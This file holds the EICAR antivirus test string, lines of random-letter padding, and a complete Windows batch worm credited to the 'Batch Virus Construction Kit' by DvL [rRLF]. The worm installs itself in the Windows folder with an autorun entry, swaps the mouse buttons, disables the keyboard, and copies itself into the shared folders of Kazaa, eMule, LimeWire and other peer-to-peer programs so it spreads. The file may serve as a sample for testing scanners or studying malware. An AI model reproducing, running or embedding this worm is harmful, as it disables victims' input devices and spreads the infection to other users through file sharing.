X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
egphtmfqehzhuvgsymghwuguzystelghqavcwpntsxjfxafmuegwhcpzaexjthujgpuybrecvzthsjxgadvagaidjtlfzmrskv
dxgaieafvpcdmnybqtrvruljzgufaumlnyjxdoplgdarevbuhdmvsmqwfobvbeygqdhotsakrzjecrscmdnhrtjaseroxjeabn
yiifrxsdazjqiuwwslsdbofcptryonocfmbpzsbpwjffipciaqxdcijkrqplnoryahbjiqkmxptychunhdmhwcucvnuilxdaga
mcdlisyydjbsrnmepevqdezrkeuipkvzngvxnlytnaqpjilcjgiscsbkqmxqrdqlikturpufckeunzceyducitxypvfpbgqrac
jxjgkqzcczunjqngrqlhmpltdzksrzuvcailrjjpwzwzevgfhadkrrjscpjqsqtehxeempjkvqjjkahoddbbkkmhleoapxcpjk
pnvqddlqytylttprwinczaqorxhbastffmnvwgbvgcskwjalfgabzkamkhqkpzvdrcnjsicyanqfsywgtvtnsactifpgazbask
rovwzuuzpdnzowdcpugjeedsbvlfuowkzsijdeionljalbacnduzslnwxlbfloxehcllyvfgilmqypbwkwljclcqcjynkvksmz
gouoddwjzhnhyleflctwncmwirddbbnqyhcesecnaonxhvsnxscolgagieagnggjsdhkrmwftziftbxazrmhoeoucplzkiqmqr
tbqaerjalaafsavpjunwbtvlvblhpfyjxwfvvfahfctgauqzdxyiklrgoigeyvttdsdzvdvhafohrqmifjmqmdsobnmbrrflwh
alzryniecgrupezawvfdfxtluxrznwnknigdoontcgwodcvprwnrguawvuvbuqmwhpovvyzsdhfffpfwowhbathohtadfgdkzi
::
:: Generated by Batch Virus Construction Kit 0.3 [DvL]-[rRLF]
:: Created by DvL [rRLF]
::
@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\wfghhqwx.bat>nul
echo.@call %windir%\wfghhqwx.bat>%windir%\winstart.bat
rundll32 user,swapmousebutton
rundll32 keyboard,disable
copy %0 c:\kazaa\myshar~1\wfghhqwx.bat>nul
copy %0 c:\mydown~1\wfghhqwx.bat>nul
copy %0 c:\mydocu~1\wfghhqwx.bat>nul
copy %0 c:\eigene~1\wfghhqwx.bat>nul
copy %0 c:\progra~1\applej~1\incoming\wfghhqwx.bat>nul
copy %0 c:\progra~1\bearsh~1\shared\wfghhqwx.bat>nul
copy %0 c:\progra~1\edonke~1\incoming\wfghhqwx.bat>nul
copy %0 c:\progra~1\emule\incoming\wfghhqwx.bat>nul
copy %0 c:\progra~1\grokster\mygrok~1\wfghhqwx.bat>nul
copy %0 c:\progra~1\icq\shared~1\wfghhqwx.bat>nul
copy %0 c:\progra~1\kazaa\myshar~1\wfghhqwx.bat>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\wfghhqwx.bat>nul
copy %0 c:\progra~1\kmd\myshar~1\wfghhqwx.bat>nul
copy %0 c:\progra~1\limewire\shared\wfghhqwx.bat>nul
copy %0 c:\progra~1\morpheus\myshar~1\wfghhqwx.bat>nul
copy %0 c:\progra~1\overnet\bundles\wfghhqwx.bat>nul
cls
